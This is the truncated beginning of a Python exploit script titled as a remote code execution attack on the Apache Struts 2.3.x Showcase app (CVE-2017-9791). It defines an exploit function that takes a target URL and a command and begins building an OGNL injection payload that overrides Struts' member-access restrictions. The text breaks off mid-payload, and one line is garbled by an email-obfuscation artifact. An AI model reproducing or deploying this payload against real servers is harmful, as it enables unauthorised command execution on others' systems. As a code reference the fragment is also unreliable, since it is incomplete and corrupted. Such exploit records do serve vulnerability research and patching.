Apache Struts 2.3.x Showcase - Remote Code Execution
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Just a demo for CVE-2017-9791
import requests
def exploit(url, cmd):
print("[+] command: %s" % cmd)
payload = "%{"
payload += "(#
[email protected]@DEFAULT_MEMBER_ACCESS)."...